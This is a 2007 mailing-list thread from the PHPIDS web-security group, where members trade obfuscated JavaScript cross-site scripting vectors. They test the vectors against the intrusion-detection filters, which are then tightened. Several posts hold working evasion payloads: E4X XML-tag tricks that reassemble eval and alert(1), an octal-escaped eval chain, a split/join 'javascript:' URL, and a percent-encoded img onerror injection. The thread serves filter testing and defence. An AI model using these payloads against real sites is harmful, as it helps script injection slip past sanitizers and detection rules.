obfuscated javascript

9 views
Skip to first unread message

thornmaker

unread,
Sep 16, 2007, 3:27:09 PM9/16/07
to PHPIDS » Web Application Security 2.0
This is only partially related to the IDS, but working on these
injections inspired me to put together a demo page of some of the
weird stuff you can do with javascript. There is a brief writeup on
my site at http://p42.us/ including the link to the demo text. I had
to leave some of the obfuscation techniques out because I want it to
work in both Firefox and IE. Please let me know if you have any
suggestions for improvements!

By the way, I just tried the demo javascript (minus the script tags)
at demo.php-ids.org... It triggered 16 filters and a score of 71!

Mario Heiderich

unread,
Sep 16, 2007, 4:31:36 PM9/16/07
to php...@googlegroups.com
@David: Sounds interesting but I can't find the link.

"DAMN! What a screwy language." (cite from p42 page)
Yes - I totally agree with you. Xorrers latest vectors prove that once again ;)

Greetings,
.mario


2007/9/16, thornmaker <thorn...@gmail.com>:

thornmaker

unread,
Sep 16, 2007, 4:55:15 PM9/16/07
to PHPIDS » Web Application Security 2.0
Hmm... I'll see about making the link more clear. In the meantime,
try this: http://p42.us/stuff/wtf.txt
and to see how it executes: http://p42.us/stuff/wtf.html

On Sep 16, 4:31 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:


> @David: Sounds interesting but I can't find the link.
>
> "DAMN! What a screwy language." (cite from p42 page)
> Yes - I totally agree with you. Xorrers latest vectors prove that once again
> ;)
>
> Greetings,
> .mario
>

> 2007/9/16, thornmaker <thornma...@gmail.com>:


>
>
>
>
>
> > This is only partially related to the IDS, but working on these
> > injections inspired me to put together a demo page of some of the
> > weird stuff you can do with javascript. There is a brief writeup on

> > my site athttp://p42.us/ including the link to the demo text. I had


> > to leave some of the obfuscation techniques out because I want it to
> > work in both Firefox and IE. Please let me know if you have any
> > suggestions for improvements!
>
> > By the way, I just tried the demo javascript (minus the script tags)
> > at demo.php-ids.org... It triggered 16 filters and a score of 71!
>

> --
> _______________________
> php-ids.org

Gareth

unread,
Sep 16, 2007, 6:27:58 PM9/16/07
to PHPIDS » Web Application Security 2.0
Here's one that didn't work but you might find the xml tags
interesting:-
s1=<s>evalalerta(1)a</s>,s2=<s></s>+'',s3=s1+s2,e1=/s/!=/s/?s3[0]:
0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/
s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/
s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:
0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:
0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a)

I think Mario was updating the filters when I tried this one so it
didn't get through, if I had more time I'd write another one but I'm
sure someone else will be able to use this idea

On Sep 16, 9:55 pm, thornmaker <thornma...@gmail.com> wrote:
> Hmm... I'll see about making the link more clear. In the meantime,
> try this:http://p42.us/stuff/wtf.txt
> and to see how it executes:http://p42.us/stuff/wtf.html
>
> On Sep 16, 4:31 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
> wrote:
>
>
>
>
>
> > @David: Sounds interesting but I can't find the link.
>
> > "DAMN! What a screwy language." (cite from p42 page)
> > Yes - I totally agree with you. Xorrers latest vectors prove that once again
> > ;)
>
> > Greetings,
> > .mario
>
> > 2007/9/16, thornmaker <thornma...@gmail.com>:
>
> > > This is only partially related to the IDS, but working on these
> > > injections inspired me to put together a demo page of some of the
> > > weird stuff you can do with javascript. There is a brief writeup on

> > > my site athttp://p42.us/including the link to the demo text. I had

Gareth

unread,
Sep 16, 2007, 8:43:53 PM9/16/07
to PHPIDS » Web Application Security 2.0
How about this for obscure:-
123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>);

> > > > my site athttp://p42.us/includingthe link to the demo text. I had

thornmaker

unread,
Sep 16, 2007, 11:19:07 PM9/16/07
to PHPIDS » Web Application Security 2.0
I really like this html tags trick to assign variables... very
clever. I would add it to the JavaScript however it appears to only
work with Firefox. There are a couple of other firefox only ones...
such as 0[]() to execute an a function rather than this[](). Perhaps
if people uncover more, I'll add a separate firefox only version.
Anyhow, thanks for the info Gareth!

> > > > > my site athttp://p42.us/includingthelink to the demo text. I had

Mario Heiderich

unread,
Sep 17, 2007, 3:25:13 AM9/17/07
to php...@googlegroups.com
Yep - XML predicates only work with gecko. As long as you use valid X(HTM)ML you can handle it like a normal variable and preform xpath operations on it like this:

a=<a>
<b>
%3c%69%6d%67%2f%73%72%63%3d%31
%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e
</b>
</a>
document.write(unescape(a..b))


A while ago I gathered some few links on that issue here http://del.icio.us/.mario/e4x but unfortunately didn't have time to look into it any deeper. I am still the opinion that there could be  way to mis-use this feature for CSRF on steroids...

Greetings,
.mario

2007/9/17, thornmaker <thorn...@gmail.com>:



--
_______________________
php-ids.org

xorrer

unread,
Sep 17, 2007, 5:08:54 AM9/17/07
to PHPIDS » Web Application Security 2.0
@Gareth

You where right. http://groups.google.com/group/php-ids/msg/74ba23034387d28d

Gareth

unread,
Sep 17, 2007, 5:11:12 AM9/17/07
to PHPIDS » Web Application Security 2.0
@xorrer

Cool stuff man! I knew it :D

On Sep 17, 10:08 am, xorrer <obhvsbypqg...@gmail.com> wrote:
> @Gareth
>
> You where right.http://groups.google.com/group/php-ids/msg/74ba23034387d28d

Gareth

unread,
Sep 17, 2007, 5:21:34 AM9/17/07
to PHPIDS » Web Application Security 2.0
@xorrer I'm on MSN Messenger if you're interested in a new contact :)

Gareth

unread,
Sep 17, 2007, 7:27:57 AM9/17/07
to PHPIDS » Web Application Security 2.0
This one is cool:-
o={x:''+<s>eva</s>+<s>l</s>,y:''+<s>aler</s>+<s>t</s>+<s>(1)</
s>};function f() { 0[this.x](this.y) }f.call(o);

Gareth

unread,
Sep 17, 2007, 9:56:19 AM9/17/07
to PHPIDS » Web Application Security 2.0
More XML based stuff:-
a=<r><s>eva</s><s>l</s><a>ale</a><a>rt</a><a>(1)</a></r>
0[a.s.text()](a.a.text()+'')

thornmaker

unread,
Sep 17, 2007, 11:41:28 PM9/17/07
to PHPIDS » Web Application Security 2.0
good stuff everyone. it's fun having new things to play with

Gareth

unread,
Sep 18, 2007, 8:17:02 AM9/18/07
to PHPIDS » Web Application Security 2.0
Eval + Unicode attack:-

x=eval,1,1,1;1;
1,1,1,b='\\',1,1,1;
1,1,1,s='\'',1,1,1;
1,1,1,o='0',1,1,1;
x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) );

Gareth

unread,
Oct 4, 2007, 11:37:42 AM10/4/07
to PHPIDS » Web Application Security 2.0
I thought this was cool, it gets a score of 5:-
new Image().src= !null?'javascriptz:zalertz(1)'['split']('z')['join']
([]):0

I'd get it work around the filters but I can't be arsed plus I've got
a lot on. Tested under Opera, may work in IE though

Mario Heiderich

unread,
Oct 4, 2007, 12:09:46 PM10/4/07
to php...@googlegroups.com
Nice ones! I added some extra spice to make that attack pattern more unlikely to slip through.

Let's start to put those kind of beauties into the Wiki? What do you think?
https://trac.php-ids.org/wiki/VectorWiki

Greetings!
.mario

2007/10/4, Gareth <gazh...@gmail.com>:

I thought this was cool, it gets a score of 5:-
new Image().src= !null?'javascriptz:zalertz(1)'['split']('z')['join']
([]):0

I'd get it work around the filters but I can't be arsed plus I've got
a lot on. Tested under Opera, may work in IE though

On Sep 18, 1:17 pm, Gareth <gazhe...@gmail.com> wrote:
> Eval + Unicode attack:-
>
> x=eval,1,1,1;1;
> 1,1,1,b='\\',1,1,1;
> 1,1,1,s='\'',1,1,1;
> 1,1,1,o='0',1,1,1;
> x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) );
>
> On Sep 18, 4:41 am, thornmaker < thornma...@gmail.com> wrote:
>
> > good stuff everyone.  it's fun having new things to play with
>
> > On Sep 17, 9:56 am, Gareth < gazhe...@gmail.com> wrote:
>
> > > More XML based stuff:-
> > > a=<r><s>eva</s><s>l</s><a>ale</a><a>rt</a><a>(1)</a></r>
> > > 0[a.s.text()](a.a.text()+'')
>
> > > On Sep 17, 12:27 pm, Gareth <gazhe...@gmail.com> wrote:
>
> > > > This one is cool:-
> > > > o={x:''+<s>eva</s>+<s>l</s>,y:''+<s>aler</s>+<s>t</s>+<s>(1)</
> > > > s>};function f() { 0[this.x](this.y ) }f.call(o);

>
> > > > On Sep 17, 10:21 am, Gareth <gazhe...@gmail.com> wrote:
>
> > > > > @xorrer I'm on MSN Messenger if you're interested in a new contact :)
>
> > > > > On Sep 17, 10:11 am, Gareth <gazhe...@gmail.com> wrote:
>
> > > > > > @xorrer
>
> > > > > > Cool stuff man! I knew it :D
>
> > > > > > On Sep 17, 10:08 am, xorrer <obhvsbypqg...@gmail.com> wrote:
>
> > > > > > > @Gareth
>
> > > > > > > You where right.http://groups.google.com/group/php-ids/msg/74ba23034387d28d
>
> > > > > > > On Sep 17, 12:27 am, Gareth <gazhe...@gmail.com> wrote:
>
> > > > > > > > Here's one that didn't work but you might find the xml tags
> > > > > > > > interesting:-
> > > > > > > > s1=<s>evalalerta(1)a</s>,s2=<s></s>+'',s3=s1+s2,e1=/s/!=/s/?s3[0]:
> > > > > > > > 0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/
> > > > > > > > s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/
> > > > > > > > s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:
> > > > > > > > 0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:
> > > > > > > > 0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a)
>
> > > > > > > > I think Mario was updating the filters when I tried this one so it
> > > > > > > > didn't get through, if I had more time I'd write another one but I'm
> > > > > > > > sure someone else will be able to use this idea







--
_______________________
php-ids.org
Reply all
Reply to author
Forward
0 new messages